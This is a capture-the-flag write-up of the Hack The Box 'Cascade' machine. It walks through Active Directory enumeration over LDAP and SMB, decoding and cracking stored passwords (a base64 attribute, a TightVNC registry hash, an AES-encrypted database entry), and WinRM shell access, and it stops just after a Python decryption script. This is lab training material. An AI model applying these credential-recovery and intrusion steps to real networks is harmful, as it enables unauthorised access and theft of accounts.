> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box/htb-cascade.md).

# HTB - Cascade

## Enumeration and Foothold

```bash
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-06-17 02:56:49Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
```

### SMB

```bash
─(ajay㉿kali)-[~/Downloads]
└─$ nxc smb 10.129.19.142 -u '' -p ''   
SMB         10.129.19.142   445    CASC-DC1         [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.19.142   445    CASC-DC1         [+] cascade.local\: 
                                                                                                                    
┌──(ajay㉿kali)-[~/Downloads]
└─$ nxc smb 10.129.19.142 -u '' -p '' --shares
SMB         10.129.19.142   445    CASC-DC1         [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.19.142   445    CASC-DC1         [+] cascade.local\: 
SMB         10.129.19.142   445    CASC-DC1         [-] Error enumerating shares: STATUS_ACCESS_DENIED

```

anonymous access but cant list shares. no guest access.

No DNS ZONE transfer

### LDAP

```bash
┌──(ajay㉿kali)-[~/Downloads]
└─$ ldapsearch -H ldap://10.129.19.142  -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingContexts: DC=cascade,DC=local
namingContexts: CN=Configuration,DC=cascade,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=cascade,DC=local
namingContexts: DC=DomainDnsZones,DC=cascade,DC=local
namingContexts: DC=ForestDnsZones,DC=cascade,DC=local

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
```

Successful anonymous bind, with that in hand we can enumerate the users.

```bash
──(ajay㉿kali)-[~/Downloads]
└─$ ldapsearch -H ldap://10.129.19.142 -x -b "DC=cascade,DC=local" "(&(objectClass=user)(objectCategory=person))" sAMAccountName displayName description mail
# extended LDIF
#
# LDAPv3
# base <DC=cascade,DC=local> with scope subtree
# filter: (&(objectClass=user)(objectCategory=person))
# requesting: sAMAccountName displayName description mail 
#

# CascGuest, Users, cascade.local
dn: CN=CascGuest,CN=Users,DC=cascade,DC=local
description: Built-in account for guest access to the computer/domain
sAMAccountName: CascGuest

# ArkSvc, Services, Users, UK, cascade.local
dn: CN=ArkSvc,OU=Services,OU=Users,OU=UK,DC=cascade,DC=local
displayName: ArkSvc
sAMAccountName: arksvc

# Steve Smith, Users, UK, cascade.local
dn: CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local
displayName: Steve Smith
sAMAccountName: s.smith

# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
displayName: Ryan Thompson
sAMAccountName: r.thompson

# Util, Services, Users, UK, cascade.local
dn: CN=Util,OU=Services,OU=Users,OU=UK,DC=cascade,DC=local
displayName: Util
sAMAccountName: util

# James Wakefield, Users, UK, cascade.local
dn: CN=James Wakefield,OU=Users,OU=UK,DC=cascade,DC=local
displayName: James Wakefield
sAMAccountName: j.wakefield

# Stephanie Hickson, Users, UK, cascade.local
dn: CN=Stephanie Hickson,OU=Users,OU=UK,DC=cascade,DC=local
displayName: Stephanie Hickson
sAMAccountName: s.hickson

# John Goodhand, Users, UK, cascade.local
dn: CN=John Goodhand,OU=Users,OU=UK,DC=cascade,DC=local
displayName: John Goodhand
sAMAccountName: j.goodhand

# Adrian Turnbull, Users, UK, cascade.local
dn: CN=Adrian Turnbull,OU=Users,OU=UK,DC=cascade,DC=local
displayName: Adrian Turnbull
sAMAccountName: a.turnbull

# Edward Crowe, Users, UK, cascade.local
dn: CN=Edward Crowe,OU=Users,OU=UK,DC=cascade,DC=local
displayName: Edward Crowe
sAMAccountName: e.crowe

# Ben Hanson, Users, UK, cascade.local
dn: CN=Ben Hanson,OU=Users,OU=UK,DC=cascade,DC=local
displayName: Ben Hanson
sAMAccountName: b.hanson

# David Burman, Users, UK, cascade.local
dn: CN=David Burman,OU=Users,OU=UK,DC=cascade,DC=local
displayName: David Burman
sAMAccountName: d.burman

# BackupSvc, Services, Users, UK, cascade.local
dn: CN=BackupSvc,OU=Services,OU=Users,OU=UK,DC=cascade,DC=local
displayName: BackupSvc
sAMAccountName: BackupSvc

# Joseph Allen, Users, UK, cascade.local
dn: CN=Joseph Allen,OU=Users,OU=UK,DC=cascade,DC=local
displayName: Joseph Allen
sAMAccountName: j.allen

# Ian Croft, Users, UK, cascade.local
dn: CN=Ian Croft,OU=Users,OU=UK,DC=cascade,DC=local
displayName: Ian Croft
sAMAccountName: i.croft

# search reference
ref: ldap://ForestDnsZones.cascade.local/DC=ForestDnsZones,DC=cascade,DC=local

# search reference
ref: ldap://DomainDnsZones.cascade.local/DC=DomainDnsZones,DC=cascade,DC=local

# search reference
ref: ldap://cascade.local/CN=Configuration,DC=cascade,DC=local

# search result
search: 2
result: 0 Success

# numResponses: 19
# numEntries: 15
# numReferences: 3

```

one good tool to enumerate through ldap is windapsearch.

#### Windapsearch to enumerate AD

```bash
                                                                                                                                                       
┌──(ajay㉿kali)-[~/Tools/windapsearch]
└─$ python3 windapsearch.py --dc-ip 10.129.19.142 -u "" -p "" -U
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.19.142
[+] Getting defaultNamingContext from Root DSE
[+]     Found: DC=cascade,DC=local
[+] Attempting bind
[+]     ...success! Binded as: 
[+]      None

[+] Enumerating all AD users
[+]     Found 15 users: 

cn: CascGuest
userPrincipalName: CascGuest@cascade.local

cn: ArkSvc
userPrincipalName: arksvc@cascade.local

cn: Steve Smith
userPrincipalName: s.smith@cascade.local

cn: Ryan Thompson
userPrincipalName: r.thompson@cascade.local

cn: Util
userPrincipalName: util@cascade.local

cn: James Wakefield
userPrincipalName: j.wakefield@cascade.local

cn: Stephanie Hickson
userPrincipalName: s.hickson@cascade.local

cn: John Goodhand
userPrincipalName: j.goodhand@cascade.local

cn: Adrian Turnbull
userPrincipalName: a.turnbull@cascade.local

cn: Edward Crowe
userPrincipalName: e.crowe@cascade.local

cn: Ben Hanson
userPrincipalName: b.hanson@cascade.local

cn: David Burman
userPrincipalName: d.burman@cascade.local

cn: BackupSvc
userPrincipalName: BackupSvc@cascade.local

cn: Joseph Allen
userPrincipalName: j.allen@cascade.local

cn: Ian Croft
userPrincipalName: i.croft@cascade.local

[*] Bye!
                                                                                                                                                         
┌──(ajay㉿kali)-[~/Tools/windapsearch]
```

```bash
┌──(ajay㉿kali)-[~/Tools/windapsearch]
└─$ python3 windapsearch.py --dc-ip 10.129.19.142 -u "" -p "" -U | grep "userPrincipalName:" | cut -d: -f2 | sed 's/ @cascade.local//' | tr -d ' '
CascGuest@cascade.local
arksvc@cascade.local
s.smith@cascade.local
r.thompson@cascade.local
util@cascade.local
j.wakefield@cascade.local
s.hickson@cascade.local
j.goodhand@cascade.local
a.turnbull@cascade.local
e.crowe@cascade.local
b.hanson@cascade.local
d.burman@cascade.local
BackupSvc@cascade.local
j.allen@cascade.local
i.croft@cascade.local
```

No asreproast.

So i will try to pull the data regarding all the users and see if any passowrds are leaked in description or any other fields.

```bash
──(ajay㉿kali)-[~]
└─$ ldapsearch -H ldap://10.129.19.142 -x -b "DC=cascade,DC=local" "(&(objectClass=user)(objectCategory=person))" > all_users_ldap.txt
```

Looking through the data r.thompson has some interesting data.

```bash
# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Thompson
sn: Thompson
givenName: Ryan
distinguishedName: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109193126.0Z
whenChanged: 20200323112031.0Z
displayName: Ryan Thompson
uSNCreated: 24610
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 295010
name: Ryan Thompson
objectGUID:: LfpD6qngUkupEy9bFXBBjA==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132247339091081169
lastLogoff: 0
lastLogon: 132247339125713230
pwdLastSet: 132230718862636251
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVQQAAA==
accountExpires: 9223372036854775807
logonCount: 2
sAMAccountName: r.thompson
sAMAccountType: 805306368
userPrincipalName: r.thompson@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200126183918.0Z
dSCorePropagationData: 20200119174753.0Z
dSCorePropagationData: 20200119174719.0Z
dSCorePropagationData: 20200119174508.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132294360317419816
msDS-SupportedEncryptionTypes: 0
cascadeLegacyPwd: clk0bjVldmE=
```

i can decode the `cascadeLegacyPwd`

```bash
┌──(ajay㉿kali)-[~]
└─$ echo "clk0bjVldmE=" | base64 -d
rY4n5eva                                                                                                                                                         
```

```bash
┌──(ajay㉿kali)-[~]
└─$ nxc smb 10.129.19.142 -u 'r.thompson' -p 'rY4n5eva'         
SMB         10.129.19.142   445    CASC-DC1         [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.19.142   445    CASC-DC1         [+] cascade.local\r.thompson:rY4n5eva
```

But no shell access on winrm.

i can use the creds to enumerate the shares.

```bash
──(ajay㉿kali)-[~]
└─$ nxc smb 10.129.19.142 -u 'r.thompson' -p 'rY4n5eva' --shares
SMB         10.129.19.142   445    CASC-DC1         [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.19.142   445    CASC-DC1         [+] cascade.local\r.thompson:rY4n5eva 
SMB         10.129.19.142   445    CASC-DC1         [*] Enumerated shares
SMB         10.129.19.142   445    CASC-DC1         Share           Permissions     Remark
SMB         10.129.19.142   445    CASC-DC1         -----           -----------     ------
SMB         10.129.19.142   445    CASC-DC1         ADMIN$                          Remote Admin
SMB         10.129.19.142   445    CASC-DC1         Audit$                          
SMB         10.129.19.142   445    CASC-DC1         C$                              Default share
SMB         10.129.19.142   445    CASC-DC1         Data            READ            
SMB         10.129.19.142   445    CASC-DC1         IPC$                            Remote IPC
SMB         10.129.19.142   445    CASC-DC1         NETLOGON        READ            Logon server share 
SMB         10.129.19.142   445    CASC-DC1         print$          READ            Printer Drivers
SMB         10.129.19.142   445    CASC-DC1         SYSVOL          READ            Logon server share
```

### Smbclient to read DATA Share

```bash
─(ajay㉿kali)-[~]
└─$ smbclient //10.129.19.142/DATA -U 'cascade.local/r.thompson'
Password for [CASCADE.LOCAL\r.thompson]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sun Jan 26 22:27:34 2020
  ..                                  D        0  Sun Jan 26 22:27:34 2020
  Contractors                         D        0  Sun Jan 12 20:45:11 2020
  Finance                             D        0  Sun Jan 12 20:45:06 2020
  IT                                  D        0  Tue Jan 28 13:04:51 2020
  Production                          D        0  Sun Jan 12 20:45:18 2020
  Temps                               D        0  Sun Jan 12 20:45:15 2020

                6553343 blocks of size 4096. 1627192 blocks available
smb: \> 
```

Directory listing on Contractors Finance, Production and Temps is denied.

```bash
smb: \IT\> ls
  .                                   D        0  Tue Jan 28 13:04:51 2020
  ..                                  D        0  Tue Jan 28 13:04:51 2020
  Email Archives                      D        0  Tue Jan 28 13:00:30 2020
  LogonAudit                          D        0  Tue Jan 28 13:04:40 2020
  Logs                                D        0  Tue Jan 28 19:53:04 2020
  Temp                                D        0  Tue Jan 28 17:06:59 2020

                6553343 blocks of size 4096. 1627192 blocks available
smb: \IT\Email Archives\> ls
  .                                   D        0  Tue Jan 28 13:00:30 2020
  ..                                  D        0  Tue Jan 28 13:00:30 2020
  Meeting_Notes_June_2018.html       An     2522  Tue Jan 28 13:00:12 2020

                6553343 blocks of size 4096. 1627192 blocks available
                
smb: \IT\Email Archives\> get Meeting_Notes_June_2018.html
getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as Meeting_Notes_June_2018.html (13.4 KiloBytes/sec) (average 13.4 KiloBytes/sec)
smb: \IT\Email Archives\> 
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FvBk0pXrTm7h8aKMkAyEg%2Fimage.png?alt=media&amp;token=5d44657e-c777-4986-b1fd-eb2be943dcb0" alt=""><figcaption></figcaption></figure>

There is a Temporary accound called TempAdmin created for performing tasks related to network migration.

```bash
smb: \IT\Email Archives\> 

smb: \IT\Logs\Ark AD Recycle Bin\> ls
  .                                   D        0  Fri Jan 10 11:33:45 2020
  ..                                  D        0  Fri Jan 10 11:33:45 2020
  ArkAdRecycleBin.log                 A     1303  Tue Jan 28 20:19:11 2020

                6553343 blocks of size 4096. 1627190 blocks available
smb: \IT\Logs\Ark AD Recycle Bin\> get ArkAdRecycleBin.log
getting file \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log of size 1303 as ArkAdRecycleBin.log (7.2 KiloBytes/sec) (average 10.4 KiloBytes/sec)
```

There is also an AD log that displays info about TempAdmin being deleted by user ArkSvc

```bash
1/10/2018 15:43	[MAIN_THREAD]	** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
1/10/2018 15:43	[MAIN_THREAD]	Validating settings...
1/10/2018 15:43	[MAIN_THREAD]	Error: Access is denied
1/10/2018 15:43	[MAIN_THREAD]	Exiting with error code 5
2/10/2018 15:56	[MAIN_THREAD]	** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
2/10/2018 15:56	[MAIN_THREAD]	Validating settings...
2/10/2018 15:56	[MAIN_THREAD]	Running as user CASCADE\ArkSvc
2/10/2018 15:56	[MAIN_THREAD]	Moving object to AD recycle bin CN=Test,OU=Users,OU=UK,DC=cascade,DC=local
2/10/2018 15:56	[MAIN_THREAD]	Successfully moved object. New location CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
2/10/2018 15:56	[MAIN_THREAD]	Exiting with error code 0	
8/12/2018 12:22	[MAIN_THREAD]	** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
8/12/2018 12:22	[MAIN_THREAD]	Validating settings...
8/12/2018 12:22	[MAIN_THREAD]	Running as user CASCADE\ArkSvc
8/12/2018 12:22	[MAIN_THREAD]	Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local
8/12/2018 12:22	[MAIN_THREAD]	Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
8/12/2018 12:22	[MAIN_THREAD]	Exiting with error code 0
```

```bash
smb: \IT\Logs\> cd DCs
smb: \IT\Logs\DCs\> ls
  .                                   D        0  Tue Jan 28 19:56:00 2020
  ..                                  D        0  Tue Jan 28 19:56:00 2020
  dcdiag.log                          A     5967  Fri Jan 10 11:17:30 2020

                6553343 blocks of size 4096. 1627190 blocks available
smb: \IT\Logs\DCs\> get dcdiag.log
getting file \IT\Logs\DCs\dcdiag.log of size 5967 as dcdiag.log (31.2 KiloBytes/sec) (average 17.5 KiloBytes/sec)
smb: \IT\Logs\DCs\> 

smb: \IT\> cd Temp
smb: \IT\Temp\> ls
  .                                   D        0  Tue Jan 28 17:06:59 2020
  ..                                  D        0  Tue Jan 28 17:06:59 2020
  r.thompson                          D        0  Tue Jan 28 17:06:53 2020
  s.smith                             D        0  Tue Jan 28 15:00:01 2020

                6553343 blocks of size 4096. 1627190 blocks available
smb: \IT\Temp\> 

smb: \IT\Temp\s.smith\> ls
  .                                   D        0  Tue Jan 28 15:00:01 2020
  ..                                  D        0  Tue Jan 28 15:00:01 2020
  VNC Install.reg                     A     2680  Tue Jan 28 14:27:44 2020

                6553343 blocks of size 4096. 1627190 blocks available
smb: \IT\Temp\s.smith\> get "VNC Install.reg"
getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as VNC Install.reg (11.4 KiloBytes/sec) (average 15.7 KiloBytes/sec)
smb: \IT\Temp\s.smith\> 
```

Got all the interesting details from it. there was a s.smith directory and extracted a `VNC Install.reg` Windows Registry export (.reg file) for the TightVNC Server software.

```bash
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
**"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f**
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"RunControlInterface"=dword:00000001
"IdleTimeout"=dword:00000000
"VideoClasses"=""
"VideoRects"=""
```

and there is password for s.smith which is hex encrypted these passwords can often be recovered using tools like vncpwd or other specialized decryption scripts because the encryption algorithm is well-known and reversible.

### Cracking password using VNCPWD

```bash
# First, convert the hex to binary
echo "6bcf2a4b6e5aca0f" | xxd -r -p > vnc_passwd.bin

──(ajay㉿kali)-[~]
└─$ vncpwd vnc_passwd.bin  
Password: sT333ve2
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F66RJ8TyuUgy0pM3oyMxa%2Fimage.png?alt=media&amp;token=bd92ca5f-025f-4ba8-a0f8-193d223b5cf8" alt=""><figcaption></figcaption></figure>

```bash
┌──(ajay㉿kali)-[~]
└─$ nxc winrm 10.129.19.142 -u 's.smith' -p 'sT333ve2'
WINRM       10.129.19.142   5985   CASC-DC1         [*] Windows 7 / Server 2008 R2 Build 7601 (name:CASC-DC1) (domain:cascade.local) 
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.19.142   5985   CASC-DC1         [+] cascade.local\s.smith:sT333ve2 (Pwn3d!)

```

## Shell as s.smith

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FShCNWgyEfBd3SxmqjmCI%2Fimage.png?alt=media&amp;token=f485cf01-90fc-466f-ba1b-ee44c85718d4" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FCFgut0mzGL3e9XgSVbEE%2Fimage.png?alt=media&amp;token=8f877027-f3c6-44ee-873e-8bbe078f9268" alt=""><figcaption></figcaption></figure>

```bash
*Evil-WinRM* PS C:\Users\s.smith> net user s.smith
User name                    s.smith
Full Name                    Steve Smith
Comment
User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/28/2020 8:58:05 PM
Password expires             Never
Password changeable          1/28/2020 8:58:05 PM
Password required            Yes
User may change password     No

Workstations allowed         All
**Logon script                 MapAuditDrive.vbs**
User profile
Home directory
Last logon                   1/29/2020 12:26:39 AM

Logon hours allowed          All

Local Group Memberships      *Audit Share          *IT
                             *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.
```

Whenever s.smith logins there is a logon script that is running.

```bash
*Evil-WinRM* PS C:\Users\s.smith> dir C:\ -Recurse -Filter "MapAuditDrive.vbs" -ErrorAction SilentlyContinue

    Directory: C:\Windows\SYSVOL\domain\scripts

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/15/2020   9:50 PM            258 MapAuditDrive.vbs
```

```bash
*Evil-WinRM* PS C:\Windows\SYSVOL\domain\scripts> type MapAuditDrive.vbs
'MapAuditDrive.vbs
Option Explicit
Dim oNetwork, strDriveLetter, strRemotePath
strDriveLetter = "F:"
strRemotePath = "\\CASC-DC1\Audit$"
Set oNetwork = CreateObject("WScript.Network")
oNetwork.MapNetworkDrive strDriveLetter, strRemotePath
WScript.Quit
*Evil-WinRM* PS C:\Windows\SYSVOL\domain\scripts> 
```

s.smith is automatically mapping the `\CASC-DC1\Audit$` share to their F: drive upon login.

```bash
*Evil-WinRM* PS Microsoft.PowerShell.Core\FileSystem::\\CASC-DC1\Audit$> ls

    Directory: \\CASC-DC1\Audit$

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        1/28/2020   9:40 PM                DB
d-----        1/26/2020  10:25 PM                x64
d-----        1/26/2020  10:25 PM                x86
-a----        1/28/2020   9:46 PM          13312 CascAudit.exe
-a----        1/29/2020   6:00 PM          12288 CascCrypto.dll
-a----        1/28/2020  11:29 PM             45 RunAudit.bat
-a----       10/27/2019   6:38 AM         363520 System.Data.SQLite.dll
-a----       10/27/2019   6:38 AM         186880 System.Data.SQLite.EF6.dll

*Evil-WinRM* PS Microsoft.PowerShell.Core\FileSystem::\\CASC-DC1\Audit$> cd DB
*Evil-WinRM* PS Microsoft.PowerShell.Core\FileSystem::\\CASC-DC1\Audit$\DB> DIR

    Directory: \\CASC-DC1\Audit$\DB

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/28/2020   9:39 PM          24576 Audit.db

*Evil-WinRM* PS Microsoft.PowerShell.Core\FileSystem::\\CASC-DC1\Audit$\DB> 

```

There is a database file  which  i can extract it to my machine and examine further.

```bash
*Evil-WinRM* PS Microsoft.PowerShell.Core\FileSystem::\\CASC-DC1\Audit$\DB> download Audit.db
                                        
Info: Downloading Microsoft.PowerShell.Core\FileSystem::\\CASC-DC1\Audit$\DB\Audit.db to Audit.db
                                        
Info: Download successful!
*Evil-WinRM* PS Microsoft.PowerShell.Core\FileSystem::\\CASC-DC1\Audit$\DB> 

```

```bash
──(ajay㉿kali)-[~]
└─$ file Audit.db                                         
Audit.db: SQLite 3.x database, last written using SQLite version 3027002, file counter 60, database pages 6, 1st free page 6, free pages 1, cookie 0x4b, schema 4, UTF-8, version-valid-for 60
```

The file is a sqlite3 database file.

### Reading SQLITE3 database file

```bash
                                                                                                                    
┌──(ajay㉿kali)-[~]
└─$ sqlite3 Audit.db
SQLite version 3.46.1 2024-08-13 09:16:08
Enter ".help" for usage hints.
sqlite> .tables
DeletedUserAudit  Ldap              Misc            
sqlite> .schema Ldap
CREATE TABLE IF NOT EXISTS "Ldap" (
        "Id"    INTEGER PRIMARY KEY AUTOINCREMENT,
        "uname" TEXT,
        "pwd"   TEXT,
        "domain"        TEXT
);
sqlite> SELECT * FROM Ldap;
1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local
sqlite> .tables
DeletedUserAudit  Ldap              Misc            
sqlite> SELECT * FROM DeletedUserAudit;
6|test|Test
DEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d|CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
7|deleted|deleted guy
DEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef|CN=deleted guy\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local
9|TempAdmin|TempAdmin
DEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a|CN=TempAdmin\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local
sqlite> SELECT * FROM Misc;
sqlite> 
```

The password is base64 encrypted but decoding it gives a binary data. There is also a bat file.

```bash
*Evil-WinRM* PS Microsoft.PowerShell.Core\FileSystem::\\CASC-DC1\Audit$> cat RunAudit.bat
CascAudit.exe "\\CASC-DC1\Audit$\DB\Audit.db"
*Evil-WinRM* PS Microsoft.PowerShell.Core\FileSystem::\\CASC-DC1\Audit$> 
```

it runs CascAudit.exe on the databse file.

i am gonna get the files to my machine and investigate further.

```bash
*Evil-WinRM* PS Microsoft.PowerShell.Core\FileSystem::\\CASC-DC1\Audit$> download CascAudit.exe
                                        
Info: Downloading Microsoft.PowerShell.Core\FileSystem::\\CASC-DC1\Audit$\CascAudit.exe to CascAudit.exe
                                        
Info: Download successful!
*Evil-WinRM* PS Microsoft.PowerShell.Core\FileSystem::\\CASC-DC1\Audit$> download RunAudit.bat
 
                                        
Info: Downloading Microsoft.PowerShell.Core\FileSystem::\\CASC-DC1\Audit$\RunAudit.bat to RunAudit.bat
                                        
Info: Download successful!
*Evil-WinRM* PS Microsoft.PowerShell.Core\FileSystem::\\CASC-DC1\Audit$> 

*Evil-WinRM* PS C:\SHares\Audit> download CascCrypto.dll
                                        
Info: Downloading C:\SHares\Audit\CascCrypto.dll to CascCrypto.dll
                                        
Info: Download successful!
*Evil-WinRM* PS C:\SHares\Audit> 
```

```powershell
─(ajay㉿kali)-[~]
└─$ file CascAudit.exe   
CascAudit.exe: PE32 executable for MS Windows 4.00 (console), Intel i386 Mono/.Net assembly, 3 sections
```

the executable is a .NET file. I can use ILSpycmd to read the .NET file

### ilspycmd to read .NET executable

```powershell
┌──(ajay㉿kali)-[~]
└─$ ilspycmd CascAudit.exe 
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Configuration;
using System.Data.SQLite;
using System.Diagnostics;
using System.DirectoryServices;
using System.Globalization;

<snip>
string text = string.Empty;
                                string password = string.Empty;
                                string text2 = string.Empty;
                                try
                                {
                                        val.Open();
                                        SQLiteCommand val2 = new SQLiteCommand("SELECT * FROM LDAP", val);
                                        try
                                        {
                                                SQLiteDataReader val3 = val2.ExecuteReader();
                                                try
                                                {
                                                        val3.Read();
                                                        text = Conversions.ToString(val3["Uname"]);
                                                        text2 = Conversions.ToString(val3["Domain"]);
                                                        string encryptedString = Conversions.ToString(val3["Pwd"]);
                                                        try
                                                        {
                                                                password = Crypto.DecryptString(encryptedString, "c4scadek3y654321");
                                                        }
                                                        catch (Exception ex)
                                                        {
                                                                ProjectData.SetProjectError(ex);
                                                                Exception ex2 = ex;
                                                                Console.WriteLine("Error decrypting password: " + ex2.Message);
                                                                ProjectData.ClearProjectError();
                                                                return;

```

There is a decrypt key : `c4scadek3y654321`

reading the dll file i found the IV

```powershell
namespace CascCrypto
{
        public class Crypto
        {
                public const string DefaultIV = "1tdyjCbY1Ix49842";

                public const int Keysize = 128;

                public static string EncryptString(string Plaintext, string Key)
                {
                        byte[] bytes = Encoding.UTF8.GetBytes(Plaintext);
                        Aes aes = Aes.Create();
                        aes.BlockSize = 128;
                        aes.KeySize = 128;
                        aes.IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842");
                        aes.Key = Encoding.UTF8.GetBytes(Key);
                        aes.Mode = CipherMode.CBC;
                        using MemoryStream memoryStream = new MemoryStream();
                        using (CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateEncryptor(), CryptoStreamMode.Write))
                        {

```

Now inorder to decrypt the key i will use a simple python script below

```python
from Crypto.Cipher import AES
import base64

key = b"c4scadek3y654321"
iv  = b"1tdyjCbY1Ix49842"
encrypted = base64.b64decode("BQO5l5Kj9MdErXx6Q6AGOw==")

cipher = AES.new(key, AES.MODE_CBC, iv=iv)
decrypted = cipher.decrypt(encrypted)
pad = decrypted[-1]
print(decrypted[:-pad].decode())
```

```bash
